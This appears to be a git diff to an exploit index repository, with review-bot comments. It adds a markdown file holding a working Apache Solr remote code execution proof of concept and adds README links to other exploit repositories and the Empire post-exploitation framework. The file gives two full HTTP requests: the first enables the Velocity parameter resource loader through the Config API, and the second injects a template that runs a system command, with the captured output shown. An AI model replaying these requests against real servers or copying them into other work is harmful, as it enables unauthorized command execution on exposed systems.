diff --git a/Apache Solr RCE via Velocity Template Injection.md b/Apache Solr RCE via Velocity Template Injection.md new file mode 100644 index 0000000..d6cc403 --- /dev/null +++ b/Apache Solr RCE via Velocity Template Injection.md @@ -0,0 +1,44 @@ +``` +Apache Solr RCE via Velocity template + +Set "params.resource.loader.enabled" as true. + +Request: +======================================================================== +POST /solr/test/config HTTP/1.1 +Host: solr:8983 +Content-Type: application/json +Content-Length: 259 + +{ + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } +} +======================================================================== + + +RCE via velocity template +Request: +======================================================================== +GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 +Host: localhost:8983 +======================================================================== + + +Response: +======================================================================== +HTTP/1.1 200 OK +Content-Type: text/html;charset=utf-8 +Content-Length: 56 + + 0 uid=8983(solr) gid=8983(solr) groups=8983(solr) +======================================================================== +``` + +> from : https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt \ No newline at end of file 
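Review bot: The new file records the two-request chain but says nothing about mitigation or detection, which is what readers of this index need next to a PoC. The first request only works because the Config API at /solr/test/config accepts an unauthenticated POST that switches params.resource.loader.enabled to true, so add a line stating that leaving that setting disabled and restricting access to the /config handler breaks the chain, and that a POST to /solr/<core>/config carrying "update-queryresponsewriter" with "params.resource.loader.enabled": "true", followed by a GET with wt=velocity&v.template.custom=, is the access-log pattern to look for. Two smaller points: the Host header changes from solr:8983 in the first request to localhost:8983 in the second, so pick one host so both requests read as the same target; and the opening ``` fence has no language tag while the attribution line sits outside it, so a heading above the fence and a plain-text tag would make the file render consistently with the other entries.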
diff --git a/README.md b/README.md index ba104ff..8542e57 100644 --- a/README.md +++ b/README.md @@ -93,6 +93,12 @@ - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634) +- [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) +- [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) +- [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107) +- [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) +- [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) +- ## 提权辅助相关 @@ -102,6 +108,7 @@ - [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803) - [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP) - [远控免杀系列](https://github.com/TideSec/BypassAntiVirus) +- [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) ## PC @@ -151,6 +158,7 @@ - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack) - [SVN源代码泄露全版本Dump源码](https://github.com/admintony/svnExploit) - [多进程批量网站备份文件扫描](https://github.com/sry309/ihoneyBakFileScan) +- [Empire](https://github.com/BC-SECURITY/Empire/)|相关文章:[后渗透测试神器Empire详解](https://mp.weixin.qq.com/s/xCtkoIwVomx5f8hVSoGKpA) ## 书籍相关
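Review bot: The first README hunk (@@ -93,6 +93,12 @@) leaves a stray empty bullet `- ` after the Apache Olingo entry, which renders as a blank list item; drop it. In the same hunk the mongo-express link text has a trailing space before the closing bracket (`Remote Code Execution ]`) that should be trimmed, and the new Apache Solr entry, unlike its neighbours, carries no CVE identifier; if one is assigned to this issue, adding it would let readers cross-reference it against the `CVE-2019-12409_Apache_Solr RCE` entry three lines above.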
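Review bot: In the second README hunk (@@ -102,6 +108,7 @@) the CVE-2019-13272 entry is titled as a generic Linux privilege escalation, but the URL points at the EXP-CVE-2019-13272-aarch64 subtree of the android_vuln_poc-exp repository, i.e. an aarch64/Android build of the exploit; say so in the entry text (or link the repository root) so readers do not expect an x86_64 build.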
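Review bot: In the third README hunk (@@ -151,6 +158,7 @@) the Empire entry uses a `|相关文章:` ("related article") suffix to attach a companion write-up, a layout none of the surrounding entries use; either give the article its own bullet or document this link-plus-article form as the list convention. Empire is also a post-exploitation framework rather than a source-leak or backup-file scanner like the GitHack, svnExploit and ihoneyBakFileScan entries it is appended to, so it may belong under a different heading.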